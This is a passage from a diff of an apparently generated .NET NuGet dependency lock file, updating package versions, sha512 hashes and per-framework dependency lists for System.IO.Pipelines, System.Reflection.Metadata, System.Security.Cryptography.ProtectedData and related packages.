"4.3.0", "sha512": "sha512-WIWVPQlYLP/Zc9I6IakpBk1y8ryVGK83MtZx//zGKKi2hvHQWKAB7moRQCOz5Is/wNDksiYpocf3FeA3le6e5Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": 
[], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", 
"System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Memory", "id": "System.Memory", "version": "4.5.5", "sha512": "sha512-6MjlNsl7lKw0Q8lAsw2tQ89ul9x6jD2Yk3EEj+dOFoYGOE9eAUO9wNhvd4O/n97oQXlkyzqKXXUnE+kLElFy3A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.2": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.3": ["System.Buffers", 
"System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.4": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.5": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.6": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Net.Primitives", "id": "System.Net.Primitives", "version": "4.3.1", "sha512": "sha512-BgdlyYCI7rrdh36p3lMTqbkvaafPETpB1bk9iQlFdQxYE692kiXvmseXs8ghL+gEgQF2xgDc8GH4QLkSgUUs+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", 
"Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], 
"net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable"], "net462": ["System.Collections.Immutable"], "net47": ["System.Collections.Immutable"], "net471": ["System.Collections.Immutable"], "net472": ["System.Collections.Immutable"], "net48": ["System.Collections.Immutable"], "net5.0": ["System.Collections.Immutable"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable"], "netcoreapp2.1": ["System.Collections.Immutable"], "netcoreapp2.2": ["System.Collections.Immutable"], "netcoreapp3.0": ["System.Collections.Immutable"], "netcoreapp3.1": ["System.Collections.Immutable"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable"], "netstandard2.1": ["System.Collections.Immutable"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "7.0.0", "sha512": "sha512-dqk0PmO2SGulqNpuJlALPc/5vqFVZc6As4ToHeZvd+6B/DomA1/JM1nAOpSU2hkBVytU0GlwsBr4YfKSnGSchg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net472": ["System.Collections.Immutable", 
"System.Reflection.Metadata"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.5.0", "sha512": "sha512-nATsBTD2CKr4AYN6eRszhX4sptImWmBJwB/U6XKCWWfnCcrTBw8XSCm3QA9gjppkHTr8OkXUY21MR91D3QZXsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], 
"netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, 
"targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "8.0.0", "sha512": "sha512-vfR5BfUXXy3amp5aDoOTwOt9BJ8CtplaAnEKHbeTbmMW1SJMrSdviTVVRNqDB0eB9o1j/26WD1VA8JGFfr8t+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], 
"netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime", "id": "System.Runtime", "version": "4.3.1", "sha512": "sha512-Al69mPDfzdD+bKGK2HAfB+lNFOHFqnkqzNnUJmmvUe1/qEPK9M7EiTT4zuycKDPy7ev11xz8XVgJWKP0hm7NIA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.2": ["Microsoft.NETCore.Platforms", 
"Microsoft.NETCore.Targets"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.CompilerServices.Unsafe", "id": "System.Runtime.CompilerServices.Unsafe", "version": "6.0.0", "sha512": "sha512-1AVzAb5OxJNvJLnOADtexNmWgattm2XVOT3TjQTN7Dd4SqoSwai1CsN2fth42uQldJSQdz/sAec0+TzxBFgisw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.Handles", "id": "System.Runtime.Handles", "version": "4.3.0", "sha512": "sha512-CluvHdVUv54BvLTOCCyybugreDNk/rR8unMPruzXDtxSjvrQOU3M4R831/lQf4YI8VYp668FGQa/01E+Rq8PEQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], 
"net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Cryptography.ProtectedData", "id": 
"System.Security.Cryptography.ProtectedData", "version": "7.0.0", "sha512": "sha512-a34SHiyaMcLRjw/1IGXokS2cH9j8XoOhs1jUYq3m+kQcnPp6fhmeuqe5U947WqojDsVMhWAsCE6rIg8grBv9BA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Permissions", "id": "System.Security.Permissions", "version": "7.0.0", "sha512": "sha512-XNVTmQ9JuCRwRXRTDoOHEzEt0wmQeRudH9lThP0l3OBja4P3jmRHq/0H0N9Ns1OD6gNmKpjLdOeHCQEXv4iVrA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["System.Windows.Extensions"], "net7.0": ["System.Windows.Extensions"], "net8.0": ["System.Windows.Extensions"], "net9.0": ["System.Windows.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, 
"targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "8.0.0", "sha512": "sha512-hvcXZ/IR+KXxY9lC9S2izw5/fGYoODJR2r9kQSvs5v/HUAnBRuYYZPJrHzaT0CeDRJzIm8BHJb1ZrwHQ59j3uQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Memory"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Security.Principal", "id": "System.Security.Principal", "version": "4.3.0", "sha512": "sha512-24oe0NGJY32e+DFHVQzl2okM9uwYmn0Aa6nehqtVZ55/Al4Yva7S3BN934Kn5qATH7TVTUJkgxhisdfF7mKDfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], 
"netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": ["System.Runtime"], "netstandard1.1": ["System.Runtime"], "netstandard1.2": ["System.Runtime"], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Principal.Windows", "id": "System.Security.Principal.Windows", "version": "5.0.0", "sha512": "sha512-RKkgqq8ishctQTGbtXqyuOGkUx1fAhkqb1OoHYdRJRlbYLoLWkSkWYHRN/17DzplsSlZtf2Xr8BXjNhO8nRnzQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", 